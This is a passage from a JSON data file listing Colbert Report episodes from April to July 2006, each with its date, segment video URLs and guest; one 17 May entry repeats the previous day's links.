        "http://thecolbertreport.cc.com/videos/j51p1g/the-word---stay-the-course",
        "http://thecolbertreport.cc.com/videos/mq3zja/stephen-s-sound-advice---taxes",
        "http://thecolbertreport.cc.com/videos/ci41dt/michael-smerconish",
        "http://thecolbertreport.cc.com/videos/716068/sign-off---nutz"
      ],
      "guest": "Michael Smerconish"
    },
    {
      "date": "2006-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ew48u/intro---4-4-06",
        "http://thecolbertreport.cc.com/videos/ouryux/delay-retires",
        "http://thecolbertreport.cc.com/videos/3pmhdv/the-word---birdie",
        "http://thecolbertreport.cc.com/videos/fgj62q/balls-for-kidz---plastic-surgery",
        "http://thecolbertreport.cc.com/videos/3sqfo3/jesse-jackson"
      ],
      "guest": "Jesse Jackson"
    },
    {
      "date": "2006-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pxrtxy/intro---4-5-06",
        "http://thecolbertreport.cc.com/videos/1sxrid/crying",
        "http://thecolbertreport.cc.com/videos/alac6s/the-word---martyr",
        "http://thecolbertreport.cc.com/videos/6ythy9/formidable-opponent---immigration",
        "http://thecolbertreport.cc.com/videos/4ipowz/fract---russian-girls",
        "http://thecolbertreport.cc.com/videos/7hiane/harvey-mansfield",
        "http://thecolbertreport.cc.com/videos/7q90hr/sign-off---en-espanol"
      ],
      "guest": "Harvey Mansfield"
    },
    {
      "date": "2006-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4p2khi/intro---4-6-06",
        "http://thecolbertreport.cc.com/videos/yy1ecn/who-s-not-honoring-me-now----peabody-award",
        "http://thecolbertreport.cc.com/videos/wh4nku/easter-under-attack---recalled-eggs",
        "http://thecolbertreport.cc.com/videos/h6f8ks/the-word---nazis",
        "http://thecolbertreport.cc.com/videos/hqbc11/better-know-a-district---oregon-s-5th---darlene-hooley",
        "http://thecolbertreport.cc.com/videos/2v5yd4/markos-moulitsas",
        "http://thecolbertreport.cc.com/videos/a2gy6a/sign-off---spring-break"
      ],
      "guest": "Markos Moulitsas"
    },
    {
      "date": "2006-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rho2b5/intro---4-17-06",
        "http://thecolbertreport.cc.com/videos/jh0t6d/dime-boycott",
        "http://thecolbertreport.cc.com/videos/nyextq/on-notice---journal-of-paleolimnology",
        "http://thecolbertreport.cc.com/videos/swdzeg/was-it-really-that-bad----san-francisco-earthquake",
        "http://thecolbertreport.cc.com/videos/8ydrv2/reza-aslan",
        "http://thecolbertreport.cc.com/videos/nfyuyx/craziest-f--king-thing-i-ve-ever-heard---fly-glasses"
      ],
      "guest": "Reza Aslan"
    },
    {
      "date": "2006-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mwy60m/intro---4-18-06",
        "http://thecolbertreport.cc.com/videos/8zlfj4/stephen-jr--hatches-",
        "http://thecolbertreport.cc.com/videos/gi0de7/the-word---sir--yes--sir",
        "http://thecolbertreport.cc.com/videos/6epoa4/threatdown---pooh",
        "http://thecolbertreport.cc.com/videos/5peygv/anthony-romero",
        "http://thecolbertreport.cc.com/videos/9g88m0/baby-monitor",
        "http://thecolbertreport.cc.com/videos/sdky8q/who-s-not-honoring-me-now----pulitzer-prize"
      ],
      "guest": "Anthony Romero"
    },
    {
      "date": "2006-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/msbasq/intro---4-19-06",
        "http://thecolbertreport.cc.com/videos/8e53yj/white-house-press-secretary",
        "http://thecolbertreport.cc.com/videos/usn2co/global-warming-tv",
        "http://thecolbertreport.cc.com/videos/ai2zb9/the-word---save-it",
        "http://thecolbertreport.cc.com/videos/0nrquc/tip-wag---tom-cruise-and-katie-holmes",
        "http://thecolbertreport.cc.com/videos/x40hn2/caitlin-flanagan"
      ],
      "guest": "Caitlin Flanagan"
    },
    {
      "date": "2006-04-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ejbl27/intro---4-20-06",
        "http://thecolbertreport.cc.com/videos/qw6of6/protecting-kids-from-papers",
        "http://thecolbertreport.cc.com/videos/agw4nc/the-word---bard",
        "http://thecolbertreport.cc.com/videos/yrza7w/better-know-a-district---maryland-s-4th---albert-wynn",
        "http://thecolbertreport.cc.com/videos/isrl05/ralph-nader"
      ],
      "guest": "Ralph Nader"
    },
    {
      "date": "2006-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ed2ifv/intro---4-24-06",
        "http://thecolbertreport.cc.com/videos/yd10jl/wok-this-way",
        "http://thecolbertreport.cc.com/videos/nhj8qv/money---politics--the-machine-that-ain-t-broke",
        "http://thecolbertreport.cc.com/videos/z1f4bz/duke-obilia-auction",
        "http://thecolbertreport.cc.com/videos/svw55c/hugh-hewitt",
        "http://thecolbertreport.cc.com/videos/qzp0e4/sign-off---chatty-cathy"
      ],
      "guest": "Hugh Hewitt"
    },
    {
      "date": "2006-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h6j9ry/intro---4-25-06",
        "http://thecolbertreport.cc.com/videos/y1ry7v/contacting-john-lennon",
        "http://thecolbertreport.cc.com/videos/ef5fdk/the-word---panama",
        "http://thecolbertreport.cc.com/videos/6iaobq/threatdown---tom-hanks",
        "http://thecolbertreport.cc.com/videos/6smo0z/fract---middle-name",
        "http://thecolbertreport.cc.com/videos/gael38/sam-harris",
        "http://thecolbertreport.cc.com/videos/f00cpp/sign-off---bush-clock"
      ],
      "guest": "Sam Harris"
    },
    {
      "date": "2006-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xo40za/intro---4-26-06",
        "http://thecolbertreport.cc.com/videos/pjxlyg/armed-and-ready",
        "http://thecolbertreport.cc.com/videos/hhuez9/the-word---english",
        "http://thecolbertreport.cc.com/videos/ydqtim/better-know-a-district---georgia-s-11th---phil-gingrey",
        "http://thecolbertreport.cc.com/videos/thlh72/sebastian-junger",
        "http://thecolbertreport.cc.com/videos/8puf3y/sign-off---yellowcake"
      ],
      "guest": "Sebastian Junger"
    },
    {
      "date": "2006-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ry4l9/intro---4-27-06",
        "http://thecolbertreport.cc.com/videos/z7tcn4/snow--informer",
        "http://thecolbertreport.cc.com/videos/6lr3t0/the-word---white-gloves",
        "http://thecolbertreport.cc.com/videos/b4nnko/plagiarism",
        "http://thecolbertreport.cc.com/videos/g4i72k/all-you-need-to-know---sleight-of-hand",
        "http://thecolbertreport.cc.com/videos/u54lrz/bill-kristol",
        "http://thecolbertreport.cc.com/videos/efk2x7/sign-off---the-nfl-draft"
      ],
      "guest": "Bill Kristol"
    },
    {
      "date": "2006-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w2hp62/intro---5-1-06",
        "http://thecolbertreport.cc.com/videos/7jined/white-house-correspondents--dinner",
        "http://thecolbertreport.cc.com/videos/8uzt2n/the-word---drug-fueled-sex-crime",
        "http://thecolbertreport.cc.com/videos/yzcgdu/tip-wag---exxon",
        "http://thecolbertreport.cc.com/videos/5ptkiy/jon-meacham",
        "http://thecolbertreport.cc.com/videos/i3oqoh/sign-off---spam"
      ],
      "guest": "Jon Meacham"
    },
    {
      "date": "2006-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/341pc6/intro---5-2-06",
        "http://thecolbertreport.cc.com/videos/y9f7ks/magic-",
        "http://thecolbertreport.cc.com/videos/fdtzal/the-word---healthy-appetite",
        "http://thecolbertreport.cc.com/videos/hl6b8d/stephen-for-press-secretary",
        "http://thecolbertreport.cc.com/videos/lh3j87/mike-huckabee"
      ],
      "guest": "Governor Mike Huckabee"
    },
    {
      "date": "2006-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wjeu9g/intro---5-3-06",
        "http://thecolbertreport.cc.com/videos/72mru6/alan-town",
        "http://thecolbertreport.cc.com/videos/gdu7ux/the-word---name-game",
        "http://thecolbertreport.cc.com/videos/f8iv5g/stephen-s-sound-advice---gas-prices",
        "http://thecolbertreport.cc.com/videos/3pdcz2/paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/65gltn/betterer-know-a-district---georgia-s-11th---phil-gingrey-bonus-edition"
      ],
      "guest": "Paul Rieckhoff"
    },
    {
      "date": "2006-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mtzlgi/exclusive---better-know-a-district---oregon-s-3rd---earl-blumenauer",
        "http://thecolbertreport.cc.com/videos/pgiz58/intro---5-4-06",
        "http://thecolbertreport.cc.com/videos/ox5eqb/national-day-of-prayer",
        "http://thecolbertreport.cc.com/videos/38ws3t/the-word---indulgence",
        "http://thecolbertreport.cc.com/videos/h6w8h9/better-know-a-district---oregon-s-3rd---earl-blumenauer",
        "http://thecolbertreport.cc.com/videos/71jv5y/rick-reilly",
        "http://thecolbertreport.cc.com/videos/4uy12b/stephen-s-keys"
      ],
      "guest": "Rick Reilly"
    },
    {
      "date": "2006-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6p8qc0/intro---5-8-06",
        "http://thecolbertreport.cc.com/videos/gk0182/stegul",
        "http://thecolbertreport.cc.com/videos/fyqj80/porter-goss-resignation",
        "http://thecolbertreport.cc.com/videos/3ig0g8/the-word---not",
        "http://thecolbertreport.cc.com/videos/zdkg2i/shere-hite",
        "http://thecolbertreport.cc.com/videos/7581zo/sign-off---thank-you--stephen-"
      ],
      "guest": "Shere Hite"
    },
    {
      "date": "2006-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v9p03c/intro---5-9-06",
        "http://thecolbertreport.cc.com/videos/t6b1ke/double-or-nothing",
        "http://thecolbertreport.cc.com/videos/mjq9vh/the-word---superegomaniac",
        "http://thecolbertreport.cc.com/videos/9w4u9e/movies-that-are-destroying-america---summer-movies",
        "http://thecolbertreport.cc.com/videos/s2q4vq/frank-rich",
        "http://thecolbertreport.cc.com/videos/hofw72/sign-off---closing-credits-contest"
      ],
      "guest": "Frank Rich"
    },
    {
      "date": "2006-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j0109g/exclusive---better-know-a-district---nebraska-s-2nd---lee-terry",
        "http://thecolbertreport.cc.com/videos/z0wmkf/intro---5-10-06",
        "http://thecolbertreport.cc.com/videos/pc9isx/the-bird-flu",
        "http://thecolbertreport.cc.com/videos/6olwle/the-word---athletes-are-above-the-law",
        "http://thecolbertreport.cc.com/videos/m1vdpp/better-know-a-district---nebraska-s-2nd---lee-terry",
        "http://thecolbertreport.cc.com/videos/kuohzs/william-bastone",
        "http://thecolbertreport.cc.com/videos/pksza0/sign-off---what-you-deserve"
      ],
      "guest": "Bill Bastone"
    },
    {
      "date": "2006-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3oo94k/intro---5-11-06",
        "http://thecolbertreport.cc.com/videos/jn8cw4/the-west-wing",
        "http://thecolbertreport.cc.com/videos/j7pjuz/the-word---fill--er-up",
        "http://thecolbertreport.cc.com/videos/yy27qi/madeleine-albright",
        "http://thecolbertreport.cc.com/videos/8nl4m3/tip-wag---gold"
      ],
      "guest": "Madeleine Albright"
    },
    {
      "date": "2006-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uhk7yp/intro---5-15-06",
        "http://thecolbertreport.cc.com/videos/nxszdr/ahmadinejad-s-letter",
        "http://thecolbertreport.cc.com/videos/g2h9yx/the-word---lunchables",
        "http://thecolbertreport.cc.com/videos/pn3k09/summaries-of-summaries",
        "http://thecolbertreport.cc.com/videos/f5iuwt/all-you-need-to-know---dick-cheney",
        "http://thecolbertreport.cc.com/videos/qrt5tg/kevin-phillips",
        "http://thecolbertreport.cc.com/videos/lww1s9/craziest-f--king-thing-i-ve-ever-heard---gas-prices"
      ],
      "guest": "Kevin Phillips"
    },
    {
      "date": "2006-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x3193a/intro---5-16-06",
        "http://thecolbertreport.cc.com/videos/swctyt/the-word---inoculation",
        "http://thecolbertreport.cc.com/videos/5qdvts/billboard",
        "http://thecolbertreport.cc.com/videos/r5u8hp/body-parts-for-sale",
        "http://thecolbertreport.cc.com/videos/kdtmpm/tyson-slocum",
        "http://thecolbertreport.cc.com/videos/53mwdm/search-for-a-new-black-friend"
      ],
      "guest": "Tyson Slocum"
    },
    {
      "date": "2006-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8b6qml/exclusive---better-know-a-president---theodore-roosevelt",
        "http://thecolbertreport.cc.com/videos/x3193a/intro---5-16-06",
        "http://thecolbertreport.cc.com/videos/swctyt/the-word---inoculation",
        "http://thecolbertreport.cc.com/videos/5qdvts/billboard",
        "http://thecolbertreport.cc.com/videos/r5u8hp/body-parts-for-sale",
        "http://thecolbertreport.cc.com/videos/kdtmpm/tyson-slocum",
        "http://thecolbertreport.cc.com/videos/53mwdm/search-for-a-new-black-friend"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2006-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wnj4cc/intro---5-17-06",
        "http://thecolbertreport.cc.com/videos/xie8nv/the-word---democrats",
        "http://thecolbertreport.cc.com/videos/3w6t72/better-know-a-president---theodore-roosevelt",
        "http://thecolbertreport.cc.com/videos/1pm4i8/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/3f6dmg/boycott",
        "http://thecolbertreport.cc.com/videos/bqqkk9/reagan-dimes"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2006-05-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ddjyzq/intro---5-18-06",
        "http://thecolbertreport.cc.com/videos/q374t3/stephen-colbert-s-guardian-eagles",
        "http://thecolbertreport.cc.com/videos/91osyo/the-word---libya",
        "http://thecolbertreport.cc.com/videos/rvxfth/difference-makers---tim-donnelly",
        "http://thecolbertreport.cc.com/videos/lga95g/fract---this-day-in-stephen-history",
        "http://thecolbertreport.cc.com/videos/jl63dd/ted-daeschler",
        "http://thecolbertreport.cc.com/videos/ddobv8/bears-eat-monkey"
      ],
      "guest": "Ted Daeschler"
    },
    {
      "date": "2006-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/63cmgz/my-first-100-shows--how-i-changed-the-world",
        "http://thecolbertreport.cc.com/videos/dk29ec/the-word---me",
        "http://thecolbertreport.cc.com/videos/sygeud/stone-phillips",
        "http://thecolbertreport.cc.com/videos/oqbssv/helium-balloon-drop",
        "http://thecolbertreport.cc.com/videos/n2keyu/the-in-box---100th-episode"
      ],
      "guest": "Stone Phillips"
    },
    {
      "date": "2006-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0jvvnp/intro---6-6-06",
        "http://thecolbertreport.cc.com/videos/zo00tb/666",
        "http://thecolbertreport.cc.com/videos/fvrhwv/the-word---military",
        "http://thecolbertreport.cc.com/videos/ohdrye/stephen-s-sound-advice---graduation",
        "http://thecolbertreport.cc.com/videos/j42g38/christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/5pxetf/sign-off---666-almost-over"
      ],
      "guest": "Christiane Amanpour"
    },
    {
      "date": "2006-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4y1ae4/intro---6-7-06",
        "http://thecolbertreport.cc.com/videos/krcfjp/balrog",
        "http://thecolbertreport.cc.com/videos/8enhyk/search-for-a-new-black-friend---first-submissions",
        "http://thecolbertreport.cc.com/videos/b9ck5g/the-word---big-deal",
        "http://thecolbertreport.cc.com/videos/q5rrxq/threatdown---bad-heroin",
        "http://thecolbertreport.cc.com/videos/g6gwcq/steve-squyres",
        "http://thecolbertreport.cc.com/videos/l4kbi3/sign-off---vaughniston"
      ],
      "guest": "Steve Squyres"
    },
    {
      "date": "2006-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8vv3c/intro---6-8-06",
        "http://thecolbertreport.cc.com/videos/5h2hdf/good-news-about-terror",
        "http://thecolbertreport.cc.com/videos/9s5g2f/the-word---goooooaaaaaal-",
        "http://thecolbertreport.cc.com/videos/tb1qzm/better-know-a-district---texas--22nd---tom-delay",
        "http://thecolbertreport.cc.com/videos/l9x3is/steve-johnson",
        "http://thecolbertreport.cc.com/videos/irk0rv/honorary-doctor"
      ],
      "guest": "Steve Johnson"
    },
    {
      "date": "2006-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kjiw2u/intro---6-12-06",
        "http://thecolbertreport.cc.com/videos/6ev021/tony-awards",
        "http://thecolbertreport.cc.com/videos/m292m0/on-notice---mort-zuckerman",
        "http://thecolbertreport.cc.com/videos/g6su9g/the-word---tom-delay-s-farewell-address",
        "http://thecolbertreport.cc.com/videos/e9sys9/tip-wag---college-students",
        "http://thecolbertreport.cc.com/videos/1zagcw/robert-f--kennedy-jr-",
        "http://thecolbertreport.cc.com/videos/rklfpc/a-tip-from-stephen-colbert-s-gardening-almanac"
      ],
      "guest": "Robert F. Kennedy Jr."
    },
    {
      "date": "2006-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/04ejnu/intro---6-13-06",
        "http://thecolbertreport.cc.com/videos/g9ijaq/stephen-jr--update",
        "http://thecolbertreport.cc.com/videos/qieya3/the-word---great-f---ing-idea",
        "http://thecolbertreport.cc.com/videos/c3pmq2/nsa-wiretapping",
        "http://thecolbertreport.cc.com/videos/2z4g9m/tim-flannery",
        "http://thecolbertreport.cc.com/videos/15yb0t/feline-bravery"
      ],
      "guest": "Tim Flannery"
    },
    {
      "date": "2006-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6tm6zq/exclusive---better-know-a-district---georgia-s-8th---lynn-westmoreland",
        "http://thecolbertreport.cc.com/videos/ddmy1c/intro---6-14-06",
        "http://thecolbertreport.cc.com/videos/3lnns6/surprise-visit-to-iraq",
        "http://thecolbertreport.cc.com/videos/l28ig3/the-word---license-renewal",
        "http://thecolbertreport.cc.com/videos/tlf8t3/better-know-a-district---georgia-s-8th---lynn-westmoreland",
        "http://thecolbertreport.cc.com/videos/4xe4qw/david-sirota",
        "http://thecolbertreport.cc.com/videos/g3hppv/sign-off---disappearing-act"
      ],
      "guest": "David Sirota"
    },
    {
      "date": "2006-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b9zn8f/intro---6-15-06",
        "http://thecolbertreport.cc.com/videos/69j400/search-for-a-new-black-friend----miami-vice--premiere",
        "http://thecolbertreport.cc.com/videos/kt2s9v/the-word---lock---load",
        "http://thecolbertreport.cc.com/videos/mqgxig/formidable-opponent---guantanamo-bay",
        "http://thecolbertreport.cc.com/videos/p118td/michael-pollan",
        "http://thecolbertreport.cc.com/videos/avxgi1/biggie-ness"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2006-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zww1j/intro---6-19-06",
        "http://thecolbertreport.cc.com/videos/hsj6mj/bill-gates",
        "http://thecolbertreport.cc.com/videos/dattp1/the-word---risky-business",
        "http://thecolbertreport.cc.com/videos/q5w5ph/threatdown---the-homo-sexy-edition",
        "http://thecolbertreport.cc.com/videos/vaw7tx/gustavo-arellano"
      ],
      "guest": "Gustavo Arellano"
    },
    {
      "date": "2006-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wanyh5/intro---6-20-06",
        "http://thecolbertreport.cc.com/videos/t2udf0/marrying-snakes",
        "http://thecolbertreport.cc.com/videos/5kkfzf/the-word---everything-must-go",
        "http://thecolbertreport.cc.com/videos/m05b1x/american-goal",
        "http://thecolbertreport.cc.com/videos/qitmnq/stephen-makes-it-simple---government",
        "http://thecolbertreport.cc.com/videos/yji71b/bart-ehrman",
        "http://thecolbertreport.cc.com/videos/cahdxo/sign-off---i-ll-call-you"
      ],
      "guest": "Bart Ehrman"
    },
    {
      "date": "2006-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ghd1lj/intro---6-21-06",
        "http://thecolbertreport.cc.com/videos/sx1i4m/truthiness-cheer",
        "http://thecolbertreport.cc.com/videos/o652yy/don-t-mess-with-jesus",
        "http://thecolbertreport.cc.com/videos/alty3q/world-cup-trash-talk---alexi-lalas",
        "http://thecolbertreport.cc.com/videos/n3wvrq/tip-wag---episcopal-church",
        "http://thecolbertreport.cc.com/videos/qjlwml/bay-buchanan",
        "http://thecolbertreport.cc.com/videos/k5qunl/sign-off---insane-clown"
      ],
      "guest": "Bay Buchanan"
    },
    {
      "date": "2006-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q057ll/exclusive---better-know-a-district---colorado-s-1st---diana-degette",
        "http://thecolbertreport.cc.com/videos/wjjbzb/intro---6-22-06",
        "http://thecolbertreport.cc.com/videos/f4jomt/stephen-s-fault",
        "http://thecolbertreport.cc.com/videos/21iu1g/stephen-hawking-is-an-a-hole",
        "http://thecolbertreport.cc.com/videos/hfgyhs/the-word---cut-and-run",
        "http://thecolbertreport.cc.com/videos/abdpyq/better-know-a-district---colorado-s-1st---diana-degette",
        "http://thecolbertreport.cc.com/videos/2oh72f/douglas-brinkley",
        "http://thecolbertreport.cc.com/videos/vh4cyy/sign-off---not-winning-prizes"
      ],
      "guest": "Doug Brinkley"
    },
    {
      "date": "2006-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nxwjfg/intro---6-26-06",
        "http://thecolbertreport.cc.com/videos/0au60f/buffett-hires-gates",
        "http://thecolbertreport.cc.com/videos/7xr6qc/medal-of-audacity",
        "http://thecolbertreport.cc.com/videos/wzsdxf/the-word---class-warfare",
        "http://thecolbertreport.cc.com/videos/gb7vwl/all-you-need-to-know---hot-planet",
        "http://thecolbertreport.cc.com/videos/ny0s7o/mark-bowden",
        "http://thecolbertreport.cc.com/videos/7zeule/sign-off---highlights-magazine"
      ],
      "guest": "Mark Bowden"
    },
    {
      "date": "2006-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fqk84n/intro---6-27-06",
        "http://thecolbertreport.cc.com/videos/wmi0fy/flammo-mcburny",
        "http://thecolbertreport.cc.com/videos/jgpsp4/greatest-conservative-rock-songs",
        "http://thecolbertreport.cc.com/videos/5xzyo9/the-word---cold--dead-fingers",
        "http://thecolbertreport.cc.com/videos/nnrjlz/movies-that-are-destroying-america---a-scanner-darkly",
        "http://thecolbertreport.cc.com/videos/360rgd/chris-matthews",
        "http://thecolbertreport.cc.com/videos/iiom30/sign-off---rubber-mop"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2006-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iehmr9/intro---6-28-06",
        "http://thecolbertreport.cc.com/videos/mdix0g/the-smoking-side-dish",
        "http://thecolbertreport.cc.com/videos/luor1n/american-flags",
        "http://thecolbertreport.cc.com/videos/ygvw1r/the-word---superman",
        "http://thecolbertreport.cc.com/videos/9i4qz9/citizens-in-action---fondue-it-yourself",
        "http://thecolbertreport.cc.com/videos/pt4qqj/robert-baer",
        "http://thecolbertreport.cc.com/videos/h13p5y/sign-off---mr--potato-head"
      ],
      "guest": "Robert Baer"
    },
    {
      "date": "2006-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/edzwgb/intro---6-29-06",
        "http://thecolbertreport.cc.com/videos/voqmme/farewell--supreme-court",
        "http://thecolbertreport.cc.com/videos/z39ivs/the-president-s-bff",
        "http://thecolbertreport.cc.com/videos/qzor72/the-word---monkey-butter",
        "http://thecolbertreport.cc.com/videos/ncmucg/difference-makers---steve-pelkey",
        "http://thecolbertreport.cc.com/videos/facpb9/christopher-noxon",
        "http://thecolbertreport.cc.com/videos/9y1lrr/star-jones"
      ],
      "guest": "Christopher Noxon"
    },
    {
      "date": "2006-07-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lp1b85/intro---7-10-06",
        "http://thecolbertreport.cc.com/videos/fweavv/world-cup-co-champions",
        "http://thecolbertreport.cc.com/videos/gud4ld/the-word---silver-foxes",
        "http://thecolbertreport.cc.com/videos/ul4u7x/stephen-s-sound-advice---avoiding-wildfires",
        "http://thecolbertreport.cc.com/videos/hfxzg3/amy-sedaris",
        "http://thecolbertreport.cc.com/videos/izyjak/wilford-brimley-calls---mexico"
      ],
      "guest": "Amy Sedaris"
    },
    {
      "date": "2006-07-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2clwx9/intro---7-11-06",
        "http://thecolbertreport.cc.com/videos/iqeepf/coddling-our-kids",
        "http://thecolbertreport.cc.com/videos/d006ym/the-word---psychopharmaparenting",
        "http://thecolbertreport.cc.com/videos/0go470/stephen-r-a-p-s----talkin--to-kids",
        "http://thecolbertreport.cc.com/videos/wpkhsp/tony-hawk",
        "http://thecolbertreport.cc.com/videos/0eibi7/stephen-colbert-s-world-of-colbertcraft"
      ],
      "guest": "Tony Hawk"
    },
    {
      "date": "2006-07-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ov83sj/exclusive---better-know-a-district---washington-s-2nd---rick-larsen",
        "http://thecolbertreport.cc.com/videos/xl7bdt/intro---7-12-06",
        "http://thecolbertreport.cc.com/videos/t0dd3g/massachusetts---gaysrael",
        "http://thecolbertreport.cc.com/videos/pey6is/the-word---the-america-conventions",
        "http://thecolbertreport.cc.com/videos/67j2yk/better-know-a-district---washington-s-2nd---rick-larsen",
        "http://thecolbertreport.cc.com/videos/pabesh/mort-zuckerman",
        "http://thecolbertreport.cc.com/videos/c4tuhx/sign-off---space-open"
      ],
      "guest": "Mort Zuckerman"
    },
    {
      "date": "2006-07-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rlgq2q/intro---7-13-06",
        "http://thecolbertreport.cc.com/videos/d3xq4i/tv-s-new-low",
        "http://thecolbertreport.cc.com/videos/d45lww/the-word---inquisition",
        "http://thecolbertreport.cc.com/videos/mu9fov/threatdown---gay-clones",
        "http://thecolbertreport.cc.com/videos/42xxhd/ron-suskind"
      ],
      "guest": "Ron Suskind"
    },
    {
      "date": "2006-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q6xn0v/intro---7-17-06",
        "http://thecolbertreport.cc.com/videos/8g7ft7/microphone-on",
        "http://thecolbertreport.cc.com/videos/9s23g8/one-american-dollar",
        "http://thecolbertreport.cc.com/videos/ne3cif/the-word---t---a",
        "http://thecolbertreport.cc.com/videos/mn3izi/tip-wag---arizona",
        "http://thecolbertreport.cc.com/videos/udm6or/lee-silver",
        "http://thecolbertreport.cc.com/videos/yz4kpe/sign-off---lemons"
      ],
      "guest": "Lee Silver"
    },
    {
      "date": "2006-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6nca03/intro---7-18-06",
        "http://thecolbertreport.cc.com/videos/zipmr4/column-width",
        "http://thecolbertreport.cc.com/videos/r9fvrq/wwiii",
        "http://thecolbertreport.cc.com/videos/y08094/the-word---solidarity",
        "http://thecolbertreport.cc.com/videos/dz7igl/stephen-colbert-s-problems-without-solutions---bears",
        "http://thecolbertreport.cc.com/videos/j9c7t7/dhani-jones",
        "http://thecolbertreport.cc.com/videos/eaenq6/try-at-goodbye"
      ],
      "guest": "Dhani Jones"
    },
    {
      "date": "2006-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2v2a4w/intro---7-19-06",
        "http://thecolbertreport.cc.com/videos/wzyudz/veto-virginity",
        "http://thecolbertreport.cc.com/videos/vmqv4k/oprah-and-gayle",
        "http://thecolbertreport.cc.com/videos/zjmkqr/the-word---r-e-s-p-e-c-t",
        "http://thecolbertreport.cc.com/videos/yluk0n/the-convenientest-truth",
        "http://thecolbertreport.cc.com/videos/xndme2/joe-scarborough",
        "http://thecolbertreport.cc.com/videos/3os5ld/sign-off---buck-o-neil"
      ],
      "guest": "Joe Scarborough"
    },
    {
      "date": "2006-07-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vx02e0/exclusive---better-know-a-district---florida-s-19th---robert-wexler",
        "http://thecolbertreport.cc.com/videos/e2w8gi/intro---7-20-06",
        "http://thecolbertreport.cc.com/videos/bpcz93/search-for-a-new-black-friend---friend-exchange-rate",
        "http://thecolbertreport.cc.com/videos/flwcdv/julian-bond",
        "http://thecolbertreport.cc.com/videos/8oaiw2/better-know-a-district---florida-s-19th---robert-wexler",
        "http://thecolbertreport.cc.com/videos/naagf7/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/8yx1of/one-regret"
      ],
      "guest": "Tom Brokaw"
    },
    {
      "date": "2006-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8l2dhx/intro---7-24-06",
        "http://thecolbertreport.cc.com/videos/b9z8jn/celebrating-america-s-kick-assedness",
        "http://thecolbertreport.cc.com/videos/mchynh/war---",
        "http://thecolbertreport.cc.com/videos/qpue58/the-word---moral-minority",
        "http://thecolbertreport.cc.com/videos/zo2o8b/threatdown---camp",
        "http://thecolbertreport.cc.com/videos/0xazqv/howell-raines",
        "http://thecolbertreport.cc.com/videos/530hq6/sign-off---proud"
      ],
      "guest": "Howell Raines"
    },
    {
      "date": "2006-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3bdqam/intro---7-25-06",
        "http://thecolbertreport.cc.com/videos/qik373/all-red-states",
        "http://thecolbertreport.cc.com/videos/mdzpjk/morning-shows",
        "http://thecolbertreport.cc.com/videos/e4fmv9/the-word---opposite-day",
        "http://thecolbertreport.cc.com/videos/bqr3op/formidable-opponent---stem-cell-research",
        "http://thecolbertreport.cc.com/videos/6xp57g/william-donohue",
        "http://thecolbertreport.cc.com/videos/wfh0qw/sign-off---food-for-thought"
      ],
      "guest": "William Donohue"
    },
    {
      "date": "2006-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sz2q6w/intro---7-26-06",
        "http://thecolbertreport.cc.com/videos/a62j0l/stephen-s-family-tree",
        "http://thecolbertreport.cc.com/videos/nxih1e/rescue-stephen-jr-",
        "http://thecolbertreport.cc.com/videos/b9kj0d/the-word---democrazy",
